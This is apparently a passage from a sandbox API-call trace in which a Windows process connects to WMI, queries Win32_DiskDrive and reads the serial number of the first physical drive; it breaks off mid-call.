[0185.769] CoGetContextToken (in: pToken=0x36eff4 | out: pToken=0x36eff4) returned 0x0 [0185.769] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x36f0c4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f0c0 | out: ppvObject=0x36f0c0*=0x769378) returned 0x0 [0185.769] WbemLocator:IUnknown:AddRef (This=0x769378) returned 0x3 [0185.769] WbemLocator:IUnknown:Release (This=0x769378) returned 0x2 [0185.773] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0185.773] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0xf, pszText=0x0) returned 0x0 [0185.773] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f24c*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f24c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.774] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f0fc | out: ppv=0x36f0fc*=0x769388) returned 0x0 [0185.774] WbemLocator:IWbemLocator:ConnectServer (in: This=0x769388, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f19c | out: ppNamespace=0x36f19c*=0x712588) returned 0x0 [0186.961] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f020 | out: ppvObject=0x36f020*=0x784a34) returned 0x0 [0186.961] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784a34, pProxy=0x712588, pAuthnSvc=0x36f070, pAuthzSvc=0x36f06c, pServerPrincName=0x36f064, pAuthnLevel=0x36f068, pImpLevel=0x36f058, pAuthInfo=0x36f05c, pCapabilites=0x36f060 | out: pAuthnSvc=0x36f070*=0xa, pAuthzSvc=0x36f06c*=0x0, pServerPrincName=0x36f064, pAuthnLevel=0x36f068*=0x6, pImpLevel=0x36f058*=0x2, pAuthInfo=0x36f05c, pCapabilites=0x36f060*=0x1) returned 0x0 [0186.961] WbemLocator:IUnknown:Release (This=0x784a34) returned 0x1 [0186.961] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f014 | out: ppvObject=0x36f014*=0x784a54) returned 0x0 [0186.961] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f000 | out: ppvObject=0x36f000*=0x784a34) returned 0x0 [0186.961] WbemLocator:IClientSecurity:SetBlanket (This=0x784a34, pProxy=0x712588, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0186.961] WbemLocator:IUnknown:Release (This=0x784a34) returned 0x2 [0186.961] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0186.961] CoTaskMemFree (pv=0x7758b0) [0186.962] WbemLocator:IUnknown:AddRef (This=0x712588) returned 0x2 [0186.962] WbemLocator:IUnknown:Release (This=0x769388) returned 0x0 [0186.962] CoGetContextToken (in: pToken=0x36e554 | out: pToken=0x36e554) returned 0x0 [0186.963] CoGetContextToken (in: pToken=0x36e964 | out: pToken=0x36e964) returned 0x0 [0186.963] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e900 | out: ppvObject=0x36e900*=0x784a3c) returned 0x0 [0186.963] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x7878c0, dwProperty=2, pdwValue=0x36e9f4 | out: pdwValue=0x36e9f4) returned 0x80004002 [0186.963] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0186.963] CoGetContextToken (in: pToken=0x36ef34 | out: pToken=0x36ef34) returned 0x0 [0186.963] CoGetContextToken (in: pToken=0x36ee94 | out: pToken=0x36ee94) returned 0x0 [0186.963] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x36ef64*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36ee30 | out: ppvObject=0x36ee30*=0x712588) returned 0x0 [0186.964] WbemLocator:IUnknown:Release (This=0x712588) returned 0x2 [0186.972] SysStringLen (param_1=0x0) returned 0x0 [0186.973] CoGetContextToken (in: pToken=0x36f054 | out: pToken=0x36f054) returned 0x0 [0186.973] IWbemServices:ExecQuery (in: This=0x712588, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_DiskDrive", lFlags=16, pCtx=0x0, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70f9f0) returned 0x0 [0187.100] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0b8 | out: ppvObject=0x36f0b8*=0x70f9f4) returned 0x0 [0187.100] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f108, pAuthzSvc=0x36f104, pServerPrincName=0x36f0fc, pAuthnLevel=0x36f100, pImpLevel=0x36f0f0, pAuthInfo=0x36f0f4, pCapabilites=0x36f0f8 | out: pAuthnSvc=0x36f108*=0xa, pAuthzSvc=0x36f104*=0x0, pServerPrincName=0x36f0fc, pAuthnLevel=0x36f100*=0x6, pImpLevel=0x36f0f0*=0x2, pAuthInfo=0x36f0f4, pCapabilites=0x36f0f8*=0x1) returned 0x0 [0187.100] IUnknown:Release (This=0x70f9f4) returned 0x1 [0187.100] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0ac | out: ppvObject=0x36f0ac*=0x784b44) returned 0x0 [0187.100] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f098 | out: ppvObject=0x36f098*=0x70f9f4) returned 0x0 [0187.100] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0187.107] IUnknown:Release (This=0x70f9f4) returned 0x2 [0187.107] WbemLocator:IUnknown:Release (This=0x784b44) returned 0x1 [0187.107] CoTaskMemFree (pv=0x775910) [0187.107] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0187.108] CoGetContextToken (in: pToken=0x36e5d8 | out: pToken=0x36e5d8) returned 0x0 [0187.108] CoGetContextToken (in: pToken=0x36e9ec | out: pToken=0x36e9ec) returned 0x0 [0187.108] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e984 | out: ppvObject=0x36e984*=0x784b2c) returned 0x0 [0187.109] WbemLocator:IRpcOptions:Query (in: This=0x784b2c, pPrx=0x787908, dwProperty=2, pdwValue=0x36ea78 | out: pdwValue=0x36ea78) returned 0x80004002 [0187.109] WbemLocator:IUnknown:Release (This=0x784b2c) returned 0x2 [0187.109] CoGetContextToken (in: pToken=0x36efbc | out: pToken=0x36efbc) returned 0x0 [0187.109] CoGetContextToken (in: pToken=0x36ef1c | out: pToken=0x36ef1c) returned 0x0 [0187.109] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36efec*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36eeb8 | out: ppvObject=0x36eeb8*=0x70f9f0) returned 0x0 [0187.109] IUnknown:Release (This=0x70f9f0) returned 0x2 [0187.110] SysStringLen (param_1=0x0) returned 0x0 [0187.110] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f2a8 | out: puCount=0x36f2a8*=0x2) returned 0x0 [0187.110] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2a4*=0x0, pszText=0x0 | out: puBuffLength=0x36f2a4*=0xf, pszText=0x0) returned 0x0 [0187.111] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f2a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.111] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0187.111] IEnumWbemClassObject:Clone (in: This=0x70f9f0, ppEnum=0x36f2b4 | out: ppEnum=0x36f2b4*=0x70fab8) returned 0x0 [0187.114] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f170 | out: ppvObject=0x36f170*=0x70fabc) returned 0x0 [0187.114] IClientSecurity:QueryBlanket (in: This=0x70fabc, pProxy=0x70fab8, pAuthnSvc=0x36f1c0, pAuthzSvc=0x36f1bc, pServerPrincName=0x36f1b4, pAuthnLevel=0x36f1b8, pImpLevel=0x36f1a8, pAuthInfo=0x36f1ac, pCapabilites=0x36f1b0 | out: pAuthnSvc=0x36f1c0*=0xa, pAuthzSvc=0x36f1bc*=0x0, pServerPrincName=0x36f1b4, pAuthnLevel=0x36f1b8*=0x6, pImpLevel=0x36f1a8*=0x2, pAuthInfo=0x36f1ac, pCapabilites=0x36f1b0*=0x1) returned 0x0 [0187.114] IUnknown:Release (This=0x70fabc) returned 0x1 [0187.114] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f164 | out: ppvObject=0x36f164*=0x784d24) returned 0x0 [0187.114] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f150 | out: ppvObject=0x36f150*=0x70fabc) returned 0x0 [0187.114] IClientSecurity:SetBlanket (This=0x70fabc, pProxy=0x70fab8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0187.116] IUnknown:Release (This=0x70fabc) returned 0x2 [0187.116] WbemLocator:IUnknown:Release (This=0x784d24) returned 0x1 [0187.116] CoTaskMemFree (pv=0x775940) [0187.116] IUnknown:AddRef (This=0x70fab8) returned 0x2 [0187.117] CoGetContextToken (in: pToken=0x36e680 | out: pToken=0x36e680) returned 0x0 [0187.117] CoGetContextToken (in: pToken=0x36ea94 | out: pToken=0x36ea94) returned 0x0 [0187.117] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea2c | out: ppvObject=0x36ea2c*=0x784d0c) returned 0x0 [0187.117] WbemLocator:IRpcOptions:Query (in: This=0x784d0c, pPrx=0x787968, dwProperty=2, pdwValue=0x36eb20 | out: pdwValue=0x36eb20) returned 0x80004002 [0187.117] WbemLocator:IUnknown:Release (This=0x784d0c) returned 0x2 [0187.117] CoGetContextToken (in: pToken=0x36f064 | out: pToken=0x36f064) returned 0x0 [0187.117] CoGetContextToken (in: pToken=0x36efc4 | out: pToken=0x36efc4) returned 0x0 [0187.117] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x36f094*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef60 | out: ppvObject=0x36ef60*=0x70fab8) returned 0x0 [0187.118] IUnknown:Release (This=0x70fab8) returned 0x2 [0187.118] SysStringLen (param_1=0x0) returned 0x0 [0187.119] IEnumWbemClassObject:Reset (This=0x70fab8) returned 0x0 [0187.125] CoTaskMemAlloc (cb=0x4) returned 0x769438 [0187.127] IEnumWbemClassObject:Next (in: This=0x70fab8, lTimeout=-1, uCount=0x1, apObjects=0x769438, puReturned=0x24f2850 | out: apObjects=0x769438*=0x7925a8, puReturned=0x24f2850*=0x1) returned 0x0 [0187.324] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e90c | out: ppvObject=0x36e90c*=0x7925a8) returned 0x0 [0187.324] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e8c0 | out: ppvObject=0x36e8c0*=0x0) returned 0x80004002 [0187.324] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e6e8 | out: ppvObject=0x36e6e8*=0x0) returned 0x80004002 [0187.325] IUnknown:AddRef (This=0x7925a8) returned 0x3 [0187.325] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e21c | out: ppvObject=0x36e21c*=0x0) returned 0x80004002 [0187.325] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e1cc | out: ppvObject=0x36e1cc*=0x0) returned 0x80004002 [0187.325] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e1d8 | out: ppvObject=0x36e1d8*=0x7925ac) returned 0x0 [0187.326] IMarshal:GetUnmarshalClass (in: This=0x7925ac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e1e0 | out: pCid=0x36e1e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0187.327] IUnknown:Release (This=0x7925ac) returned 0x3 [0187.327] CoGetContextToken (in: pToken=0x36e238 | out: pToken=0x36e238) returned 0x0 [0187.327] CoGetContextToken (in: pToken=0x36e64c | out: pToken=0x36e64c) returned 0x0 [0187.327] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e6cc | out: ppvObject=0x36e6cc*=0x0) returned 0x80004002 [0187.327] IUnknown:Release (This=0x7925a8) returned 0x2 [0187.327] CoGetContextToken (in: pToken=0x36ec34 | out: pToken=0x36ec34) returned 0x0 [0187.327] CoGetContextToken (in: pToken=0x36eb94 | out: pToken=0x36eb94) returned 0x0 [0187.327] IUnknown:QueryInterface (in: This=0x7925a8, riid=0x36ec64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36ec60 | out: ppvObject=0x36ec60*=0x7925a8) returned 0x0 [0187.327] IUnknown:AddRef (This=0x7925a8) returned 0x4 [0187.327] IUnknown:Release (This=0x7925a8) returned 0x3 [0187.327] IUnknown:Release (This=0x7925a8) returned 0x2 [0187.327] CoTaskMemFree (pv=0x769438) [0187.328] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0187.328] IUnknown:AddRef (This=0x7925a8) returned 0x3 [0187.331] IWbemClassObject:Get (in: This=0x7925a8, wszName="__GENUS", lFlags=0, pVal=0x36f2a4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f324*=0, plFlavor=0x36f320*=0 | out: pVal=0x36f2a4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f324*=3, plFlavor=0x36f320*=64) returned 0x0 [0187.334] IWbemClassObject:Get (in: This=0x7925a8, wszName="__PATH", lFlags=0, pVal=0x36f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f30c*=0, plFlavor=0x36f308*=0 | out: pVal=0x36f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"", varVal2=0x0), pType=0x36f30c*=8, plFlavor=0x36f308*=64) returned 0x0 [0187.338] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0187.338] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0187.338] CoGetObjectContext (in: riid=0x24eeee8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f2b4 | out: ppv=0x36f2b4*=0x6ee4bc) returned 0x0 [0187.339] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f2ac | out: pAptType=0x36f2ac*=1) returned 0x0 [0187.339] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x24eeed0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f2b0 | out: ppvObject=0x36f2b0*=0x0) returned 0x80004002 [0187.339] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0187.340] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ec20 | out: ppv=0x36ec20*=0x769438) returned 0x0 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x769438, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ee38 | out: ppvObject=0x36ee38*=0x0) returned 0x80004002 [0187.341] WbemDefPath:IClassFactory:CreateInstance (in: This=0x769438, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee44 | out: ppvObject=0x36ee44*=0x768ba8) returned 0x0 [0187.341] WbemDefPath:IUnknown:Release (This=0x769438) returned 0x0 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea64 | out: ppvObject=0x36ea64*=0x768ba8) returned 0x0 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ea18 | out: ppvObject=0x36ea18*=0x0) returned 0x80004002 [0187.341] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e374 | out: ppvObject=0x36e374*=0x0) returned 0x80004002 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e324 | out: ppvObject=0x36e324*=0x0) returned 0x80004002 [0187.341] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e330 | out: ppvObject=0x36e330*=0x769448) returned 0x0 [0187.342] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x769448, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e338 | out: pCid=0x36e338*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0187.342] WbemDefPath:IUnknown:Release (This=0x769448) returned 0x3 [0187.342] CoGetContextToken (in: pToken=0x36e390 | out: pToken=0x36e390) returned 0x0 [0187.342] CoGetContextToken (in: pToken=0x36e7a4 | out: pToken=0x36e7a4) returned 0x0 [0187.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e824 | out: ppvObject=0x36e824*=0x0) returned 0x80004002 [0187.342] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0187.342] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0187.342] CoGetContextToken (in: pToken=0x36f134 | out: pToken=0x36f134) returned 0x0 [0187.342] CoGetContextToken (in: pToken=0x36f094 | out: pToken=0x36f094) returned 0x0 [0187.342] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x36f164*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f160 | out: ppvObject=0x36f160*=0x768ba8) returned 0x0 [0187.342] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0187.342] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0187.342] WbemDefPath:IWbemPath:SetText (This=0x768ba8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x0 [0187.342] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f2e0 | out: puCount=0x36f2e0*=0x2) returned 0x0 [0187.343] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2dc*=0x0, pszText=0x0 | out: puBuffLength=0x36f2dc*=0xf, pszText=0x0) returned 0x0 [0187.343] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f2dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.343] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f2ac | out: puCount=0x36f2ac*=0x2) returned 0x0 [0187.343] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2a8*=0x0, pszText=0x0 | out: puBuffLength=0x36f2a8*=0xf, pszText=0x0) returned 0x0 [0187.343] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f2a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.344] IWbemClassObject:Get (in: This=0x7925a8, wszName="SerialNumber", lFlags=0, pVal=0x36f2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24f3110*=0, plFlavor=0x24f3114*=0 | out: pVal=0x36f2a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="068VC346", varVal2=0x0), pType=0x24f3110*=8, plFlavor=0x24f3114*=0) returned 0x0 [0187.344] SysStringByteLen 